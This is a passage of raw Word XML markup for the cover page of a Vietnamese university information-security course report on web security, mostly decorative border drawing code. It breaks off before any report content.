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25442" w14:textId="66014AE7" w:rsidR="007C1F99" w:rsidRPr="007C1F99" w:rsidRDefault="008872A1" w:rsidP="007C1F99">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C1F99">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251671552" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="791874E9" wp14:editId="3A1C26C1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>-485775</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-276225</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6967855" cy="8893393"/>
                <wp:effectExtent l="0" t="0" r="4445" b="3175"/>
                <wp:wrapNone/>
                <wp:docPr id="101" name="Group 101"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="6967855" cy="8893393"/>
                          <a:chOff x="1625" y="1003"/>
                          <a:chExt cx="9158" cy="14683"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="103" name="Freeform: Shape 103"/>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4" name="Freeform: Shape 104"/>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05" name="Freeform: Shape 10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6" name="Freeform: Shape 106"/>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7" name="Freeform: Shape 107"/>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8" name="Freeform: Shape 108"/>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9" name="Freeform: Shape 109"/>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0" name="Freeform: Shape 110"/>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11" name="Freeform: Shape 111"/>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12" name="Freeform: Shape 112"/>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13" name="Freeform: Shape 113"/>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14" name="Freeform: Shape 11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15" name="Freeform: Shape 115"/>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16" name="Freeform: Shape 116"/>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17" name="Freeform: Shape 117"/>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18" name="Freeform: Shape 118"/>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19" name="Freeform: Shape 119"/>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20" name="Freeform: Shape 12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21" name="Freeform: Shape 121"/>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22" name="Freeform: Shape 122"/>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23" name="Freeform: Shape 123"/>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24" name="Freeform: Shape 124"/>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25" name="Freeform: Shape 125"/>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26" name="Freeform: Shape 126"/>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27" name="Freeform: Shape 127"/>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28" name="Freeform: Shape 128"/>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29" name="Freeform: Shape 12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30" name="Freeform: Shape 130"/>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31" name="Freeform: Shape 131"/>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32" name="Freeform: Shape 132"/>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33" name="Freeform: Shape 133"/>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34" name="Freeform: Shape 134"/>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35" name="Freeform: Shape 13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36" name="Freeform: Shape 136"/>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37" name="Freeform: Shape 137"/>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38" name="Freeform: Shape 138"/>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39" name="Freeform: Shape 139"/>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40" name="Freeform: Shape 14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41" name="Freeform: Shape 14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42" name="Freeform: Shape 142"/>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43" name="Freeform: Shape 143"/>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44" name="Freeform: Shape 144"/>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45" name="Freeform: Shape 145"/>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46" name="Freeform: Shape 146"/>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47" name="Freeform: Shape 147"/>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48" name="Freeform: Shape 148"/>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49" name="Freeform: Shape 149"/>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50" name="Rectangle 150"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1759" y="4055"/>
                            <a:ext cx="82" cy="8506"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:srgbClr val="005196"/>
                          </a:solidFill>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="1AE687CB" w14:textId="77777777" w:rsidR="007C1F99" w:rsidRDefault="007C1F99" w:rsidP="008872A1">
                              <w:pPr>
                                <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                                <w:textDirection w:val="btLr"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="000000"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="151" name="Rectangle 151"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4087" y="1166"/>
                            <a:ext cx="4253" cy="86"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:srgbClr val="005196"/>
                          </a:solidFill>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="18F43D42" w14:textId="77777777" w:rsidR="007C1F99" w:rsidRDefault="007C1F99" w:rsidP="008872A1">
                              <w:pPr>
                                <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                                <w:textDirection w:val="btLr"/>
                              </w:pPr>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="152" name="Freeform: Shape 152"/>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53" name="Freeform: Shape 153"/>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54" name="Freeform: Shape 154"/>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55" name="Freeform: Shape 155"/>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56" name="Freeform: Shape 156"/>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57" name="Freeform: Shape 157"/>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58" name="Freeform: Shape 15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59" name="Freeform: Shape 159"/>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60" name="Freeform: Shape 160"/>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61" name="Freeform: Shape 161"/>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62" name="Freeform: Shape 162"/>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63" name="Freeform: Shape 16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64" name="Freeform: Shape 164"/>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65" name="Freeform: Shape 165"/>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66" name="Freeform: Shape 166"/>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67" name="Freeform: Shape 167"/>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68" name="Rectangle 168"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4087" y="15470"/>
                            <a:ext cx="4253" cy="86"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:srgbClr val="005196"/>
                          </a:solidFill>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="6CDEBD87" w14:textId="77777777" w:rsidR="007C1F99" w:rsidRDefault="007C1F99" w:rsidP="008872A1">
                              <w:pPr>
                                <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                                <w:textDirection w:val="btLr"/>
                              </w:pPr>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="169" name="Rectangle 169"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="10558" y="4118"/>
                            <a:ext cx="86" cy="8505"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:srgbClr val="005196"/>
                          </a:solidFill>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="3819D8DB" w14:textId="77777777" w:rsidR="007C1F99" w:rsidRDefault="007C1F99" w:rsidP="008872A1">
                              <w:pPr>
                                <w:spacing w:after="0"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91874E9" id="Group 101" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:-38.25pt;margin-top:-21.75pt;width:548.65pt;height:700.25pt;z-index:251671552;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">
                <v:shape id="Freeform: Shape 103"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4"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" path="m38,182r10,-9l58,153r9,-19l77,105r,-24l77,53r,-24l72,,67,19,62,43,58,57,53,77,43,86,34,96r-15,l,91r38,91xe" fillcolor="#005196" stroked="f">
                  <v:path arrowok="t" o:extrusionok="f"/>
                </v:shape>
                <v:shape id="Freeform: Shape 105"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" path="m53,77l57,53,62,39,57,20,53,5,43,5,38,,33,,29,5r-5,l19,10r-5,5l9,20,,29,,48,5,63,9,77r10,5l29,87,43,82,53,77xe" fillcolor="#005196" stroked="f">
                  <v:path arrowok="t" o:extrusionok="f"/>
                </v:shape>
                <v:shape id="Freeform: Shape 106"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07"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8"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9"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10"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" path="m116,l101,14,87,24,72,33,58,43,39,48r-15,l10,52,,48,5,62,15,72r9,9l34,91r10,9l53,110r5,5l68,115r-10,5l53,129r-9,5l39,144r-5,14l34,168r,14l44,192,159,48,116,xe" fillcolor="#005196" stroked="f">
                  <v:path arrowok="t" o:extrusionok="f"/>
                </v:shape>
                <v:shape id="Freeform: Shape 111"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" path="m153,52r-9,20l134,86r-10,24l120,129r-5,15l115,168r-5,14l115,196r-10,-9l96,177,86,168,81,153r-9,-9l67,134,62,124r,-9l57,124r-5,10l43,144r-5,9l28,158r-9,l9,153,,144,115,r38,52xe" fillcolor="#005196" stroked="f">
                  <v:path arrowok="t" o:extrusionok="f"/>
                </v:shape>
                <v:shape id="Freeform: Shape 112"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" path="m29,l44,19,63,43,77,62,96,81r15,19l120,115r10,14l135,134r5,5l140,148r,15l135,172r-5,5l120,182r-4,l106,172,92,158,77,139,58,115,44,91,29,67,15,52,5,38,,33,29,xe" fillcolor="#005196" stroked="f">
                  <v:path arrowok="t" o:extrusionok="f"/>
                </v:shape>
                <v:shape id="Freeform: Shape 113"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14"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" path="m,52l10,38,24,24,43,14,63,9,82,4,106,r19,4l149,9,130,19r-15,5l101,28,87,38,77,48,72,62,67,76r5,20l,52xe" fillcolor="#005196" stroked="f">
                  <v:path arrowok="t" o:extrusionok="f"/>
                </v:shape>
                <v:shape id="Freeform: Shape 115"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" path="m9,14l14,4r10,l33,r5,l43,,53,4r4,l62,14r5,14l67,38,57,52,53,67r-5,5l43,76r-10,l29,76,24,72r-10,l9,67r,-5l5,52,,38,,24,9,14xe" fillcolor="#005196" stroked="f">
                  <v:path arrowok="t" o:extrusionok="f"/>
                </v:shape>
                <v:shape id="Freeform: Shape 116"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17"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extrusionok="f"/>
                </v:shape>
                <v:shape id="Freeform: Shape 118"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" path="m149,34l130,53,115,77,96,96,82,115,67,135r-9,14l43,163r-5,5l34,173r-5,l19,168r-9,l5,159,,149,,139,10,125,24,111,38,91,58,72,77,53,91,29,106,15,115,r5,l149,34xe" fillcolor="#005196" stroked="f">
                  <v:path arrowok="t" o:extrusionok="f"/>
                </v:shape>
                <v:shape id="Freeform: Shape 119"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20"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" path="m33,l48,10r9,19l67,48r5,29l76,101r,29l76,154r-4,29l67,159,62,144,57,125,52,106,43,91,33,87r-14,l,87,33,xe" fillcolor="#005196" stroked="f">
                  <v:path arrowok="t" o:extrusionok="f"/>
                </v:shape>
                <v:shape id="Freeform: Shape 121"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" path="m53,9r5,19l63,48,58,67,53,81r-9,l39,86r-5,l29,81r-5,l20,76,15,72,5,67,,52,,38,5,24,10,9,20,4,29,,44,r9,9xe" fillcolor="#005196" stroked="f">
                  <v:path arrowok="t" o:extrusionok="f"/>
                </v:shape>
                <v:shape id="Freeform: Shape 122"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23"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24"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25"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26"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" path="m115,187l101,177,86,163,72,158,58,149,38,144r-14,l10,139,,144,5,129r9,-9l24,110r10,-9l43,91,53,86r5,-9l67,77,58,72,48,62,43,57,38,48,34,33,29,24,34,9,43,,158,144r-43,43xe" fillcolor="#005196" stroked="f">
                  <v:path arrowok="t" o:extrusionok="f"/>
                </v:shape>
                <v:shape id="Freeform: Shape 127"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" path="m154,149l144,130r-9,-20l125,91,120,67,115,53r,-24l111,14,115,r-9,10l96,19,87,29,82,43,72,53r-5,9l63,72r,10l58,72,53,62,43,53,39,43,29,38r-10,l10,43,,53,115,197r39,-48xe" fillcolor="#005196" stroked="f">
                  <v:path arrowok="t" o:extrusionok="f"/>
                </v:shape>
                <v:shape id="Freeform: Shape 128"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" path="m29,183l43,164,62,144,77,120,96,101,110,82,120,68,130,53r4,-5l139,39r,-10l139,20,134,10,130,5,120,,110,r-9,10l91,24,77,44,58,68,43,92,24,111,14,130,5,144,,149r29,34xe" fillcolor="#005196" stroked="f">
                  <v:path arrowok="t" o:extrusionok="f"/>
                </v:shape>
                <v:shape id="Freeform: Shape 129"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30"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" path="m,43l9,62,24,72,43,86r19,5l81,96r24,l125,96r19,-5l129,82,115,77,101,67,86,62,77,53,72,38,67,24,72,,,43xe" fillcolor="#005196" stroked="f">
                  <v:path arrowok="t" o:extrusionok="f"/>
                </v:shape>
                <v:shape id="Freeform: Shape 131"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" path="m5,62l15,72r9,l34,77r5,l44,77r9,-5l58,72,63,62,68,48r,-10l58,24,53,10,48,5,44,,34,,29,,20,5r-5,l10,10,5,14,,24,,38,,53r5,9xe" fillcolor="#005196" stroked="f">
                  <v:path arrowok="t" o:extrusionok="f"/>
                </v:shape>
                <v:shape id="Freeform: Shape 132"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33"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134"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" path="m,140l19,120,34,96,53,77,67,58,82,39,96,24,106,10r4,-5l115,r10,l134,r5,5l149,15r,9l149,34,139,44r-9,19l110,82,96,101,77,125,58,144,43,159r-9,14l29,173,,140xe" fillcolor="#005196" stroked="f">
                  <v:path arrowok="t" o:extrusionok="f"/>
                </v:shape>
                <v:shape id="Freeform: Shape 135"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36"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" path="m39,182l29,173,20,153,10,134,5,105,,81,,53,,29,5,r5,19l20,43r4,14l29,77r5,9l44,96r14,l77,91,39,182xe" fillcolor="#005196" stroked="f">
                  <v:path arrowok="t" o:extrusionok="f"/>
                </v:shape>
                <v:shape id="Freeform: Shape 137"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" path="m14,77l5,53,,39,5,20,14,5,24,,34,5r14,5l58,20r4,9l62,48,58,63,53,77,43,82r-9,5l24,82,14,77xe" fillcolor="#005196" stroked="f">
                  <v:path arrowok="t" o:extrusionok="f"/>
                </v:shape>
                <v:shape id="Freeform: Shape 138"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39"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40"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41"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42"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" path="m44,l58,14,72,24r15,9l106,43r14,5l135,48r14,4l164,48,154,62,144,72r-9,9l125,91r-9,9l106,110r-5,5l92,115r9,5l111,129r9,5l125,144r5,14l130,168r-5,14l120,192,,48,44,xe" fillcolor="#005196" stroked="f">
                  <v:path arrowok="t" o:extrusionok="f"/>
                </v:shape>
                <v:shape id="Freeform: Shape 143"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" path="m,52l9,72,19,86r5,24l29,129r4,15l38,168r,14l38,196r5,-9l53,177r9,-9l72,153r5,-9l86,134r5,-10l91,115r,9l101,134r4,10l115,153r5,5l129,158r10,-5l149,144,33,,,52xe" fillcolor="#005196" stroked="f">
                  <v:path arrowok="t" o:extrusionok="f"/>
                </v:shape>
                <v:shape id="Freeform: Shape 144"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" path="m110,l96,19,81,43,62,62,48,81,33,100,19,115,9,129r-5,5l,139r,9l4,163r,9l14,177r5,5l28,182,38,172,52,158,67,139,81,115,100,91,115,67,129,52,139,38r,-5l110,xe" fillcolor="#005196" stroked="f">
                  <v:path arrowok="t" o:extrusionok="f"/>
                </v:shape>
                <v:shape id="Freeform: Shape 145"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46"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" path="m149,52l134,38,120,24,106,14,86,9,62,4,43,,19,4,,9,14,19r15,5l43,28,58,38r9,10l72,62r5,14l72,96,149,52xe" fillcolor="#005196" stroked="f">
                  <v:path arrowok="t" o:extrusionok="f"/>
                </v:shape>
                <v:shape id="Freeform: Shape 147"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" path="m63,14l53,4,43,4,39,,29,,24,,19,4r-9,l10,14,,28,5,38r5,14l19,67r5,5l29,76r5,l39,76r9,-4l53,72r5,-5l63,62,67,52,72,38r,-14l63,14xe" fillcolor="#005196" stroked="f">
                  <v:path arrowok="t" o:extrusionok="f"/>
                </v:shape>
                <v:shape id="Freeform: Shape 148"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49"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extrusionok="f"/>
                </v:shape>
                <v:rect id="Rectangle 150"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" fillcolor="#005196" stroked="f">
                  <v:textbox inset="2.53958mm,2.53958mm,2.53958mm,2.53958mm">
                    <w:txbxContent>
                      <w:p w14:paraId="1AE687CB" w14:textId="77777777" w:rsidR="007C1F99" w:rsidRDefault="007C1F99" w:rsidP="008872A1">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                          <w:textDirection w:val="btLr"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:color w:val="000000"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 151"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" fillcolor="#005196" stroked="f">
                  <v:textbox inset="2.53958mm,2.53958mm,2.53958mm,2.53958mm">
                    <w:txbxContent>
                      <w:p w14:paraId="18F43D42" w14:textId="77777777" w:rsidR="007C1F99" w:rsidRDefault="007C1F99" w:rsidP="008872A1">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                          <w:textDirection w:val="btLr"/>
                        </w:pPr>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Freeform: Shape 152"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" path="m,34l14,53,33,77,48,96r14,19l76,135r15,14l100,163r5,5l115,173r5,l129,168r5,l144,159r,-10l144,139,134,125,124,111,110,91,91,72,72,53,52,29,38,15,28,,24,,,34xe" fillcolor="#005196" stroked="f">
                  <v:path arrowok="t" o:extrusionok="f"/>
                </v:shape>
                <v:shape id="Freeform: Shape 153"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54"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" path="m43,l29,10,19,29,10,48,5,77,,101r,29l5,154r,29l15,159r4,-15l24,125r5,-19l39,91r9,-4l58,87r19,l43,xe" fillcolor="#005196" stroked="f">
                  <v:path arrowok="t" o:extrusionok="f"/>
                </v:shape>
                <v:shape id="Freeform: Shape 155"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" path="m9,9l,28,,48,,67,9,81r10,5l33,81,43,76r9,-9l57,52r,-14l52,24,48,9,43,4,28,,19,,9,9xe" fillcolor="#005196" stroked="f">
                  <v:path arrowok="t" o:extrusionok="f"/>
                </v:shape>
                <v:shape id="Freeform: Shape 156"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57"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58"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59"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60"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" path="m38,187l53,177,67,163r19,-5l101,149r14,-5l130,144r14,-5l158,144r-9,-15l139,120r-9,-10l125,101,115,91r-9,-5l96,77r-5,l96,72,106,62r9,-5l120,48r5,-15l125,24,120,9,115,,,144r38,43xe" fillcolor="#005196" stroked="f">
                  <v:path arrowok="t" o:extrusionok="f"/>
                </v:shape>
                <v:shape id="Freeform: Shape 161"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" path="m,149l9,130,19,110,24,91,33,67,38,53r,-24l38,14,38,,48,10r4,9l62,29,72,43r9,10l86,62r5,10l91,82,96,72r4,-10l105,53,115,43r9,-5l134,38r10,5l153,53,38,197,,149xe" fillcolor="#005196" stroked="f">
                  <v:path arrowok="t" o:extrusionok="f"/>
                </v:shape>
                <v:shape id="Freeform: Shape 162"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" path="m111,183l91,164,77,144,58,120,43,101,29,82,15,68,5,53,,48,,39,,29,,20,5,10,10,5,15,r9,l34,10,48,24,63,44,77,68,96,92r15,19l125,130r10,14l139,149r-28,34xe" fillcolor="#005196" stroked="f">
                  <v:path arrowok="t" o:extrusionok="f"/>
                </v:shape>
                <v:shape id="Freeform: Shape 163"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64"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" path="m149,43l139,62,125,72,105,86,86,91,67,96r-24,l19,96,,91,19,82,33,77,48,67r9,-5l72,53,77,38r,-14l72,r77,43xe" fillcolor="#005196" stroked="f">
                  <v:path arrowok="t" o:extrusionok="f"/>
                </v:shape>
                <v:shape id="Freeform: Shape 165"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" path="m57,62l48,72r-5,l33,77r-4,l19,77,14,72r-5,l5,62,,48,,38,5,24,14,10,19,5,24,r9,l38,r5,5l48,5r9,5l57,14r5,10l67,38r,15l57,62xe" fillcolor="#005196" stroked="f">
                  <v:path arrowok="t" o:extrusionok="f"/>
                </v:shape>
                <v:shape id="Freeform: Shape 166"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67"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extrusionok="f"/>
                </v:shape>
                <v:rect id="Rectangle 168"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" fillcolor="#005196" stroked="f">
                  <v:textbox inset="2.53958mm,2.53958mm,2.53958mm,2.53958mm">
                    <w:txbxContent>
                      <w:p w14:paraId="6CDEBD87" w14:textId="77777777" w:rsidR="007C1F99" w:rsidRDefault="007C1F99" w:rsidP="008872A1">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                          <w:textDirection w:val="btLr"/>
                        </w:pPr>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 169"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" fillcolor="#005196" stroked="f">
                  <v:textbox inset="2.53958mm,2.53958mm,2.53958mm,2.53958mm">
                    <w:txbxContent>
                      <w:p w14:paraId="3819D8DB" w14:textId="77777777" w:rsidR="007C1F99" w:rsidRDefault="007C1F99" w:rsidP="008872A1">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                          <w:textDirection w:val="btLr"/>
                        </w:pPr>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <w10:wrap anchorx="margin"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="007C1F99" w:rsidRPr="007C1F99">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>BỘ GIÁO DỤC VÀ ĐÀO TẠO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07173D53" w14:textId="77777777" w:rsidR="007C1F99" w:rsidRPr="007C1F99" w:rsidRDefault="007C1F99" w:rsidP="007C1F99">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C1F99">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>TRƯỜNG ĐẠI HỌC SƯ PHẠM KỸ THUẬT TPHCM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2198485C" w14:textId="77777777" w:rsidR="007C1F99" w:rsidRPr="007C1F99" w:rsidRDefault="007C1F99" w:rsidP="007C1F99">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C1F99">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>KHOA CÔNG NGHỆ THÔNG TIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1CB588" w14:textId="77777777" w:rsidR="007C1F99" w:rsidRDefault="007C1F99" w:rsidP="007C1F99">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>----🙞🙞🖳🙜🙜----</w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251673600" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="6A6D0084" wp14:editId="72B9A72F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>2319337</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>340360</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1333500" cy="1562100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom distT="0" distB="0"/>
            <wp:docPr id="17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8"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1333500" cy="1562100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="677E866A" w14:textId="77777777" w:rsidR="007C1F99" w:rsidRDefault="007C1F99" w:rsidP="007C1F99">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CC7D12E" w14:textId="77777777" w:rsidR="007C1F99" w:rsidRPr="007C1F99" w:rsidRDefault="007C1F99" w:rsidP="007C1F99">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C1F99">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Báo cáo môn học</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688F937F" w14:textId="77777777" w:rsidR="007C1F99" w:rsidRPr="007C1F99" w:rsidRDefault="007C1F99" w:rsidP="007C1F99">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C1F99">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>AN TOÀN THÔNG TIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519D306A" w14:textId="77777777" w:rsidR="007C1F99" w:rsidRPr="007C1F99" w:rsidRDefault="007C1F99" w:rsidP="007C1F99">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C1F99">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ĐỀ TÀI:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA8F4CB" w14:textId="095C513F" w:rsidR="007C1F99" w:rsidRDefault="007C1F99" w:rsidP="007C1F99">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C1F99">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t>BẢO MẬT WEB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A58D51" w14:textId="1DF9073C" w:rsidR="007C1F99" w:rsidRPr="007C1F99" w:rsidRDefault="007C1F99" w:rsidP="005E1B43">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="4770"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>GVHD:</w:t>
      </w:r>
      <w:r w:rsidR="005E1B43">
        <w:rPr>
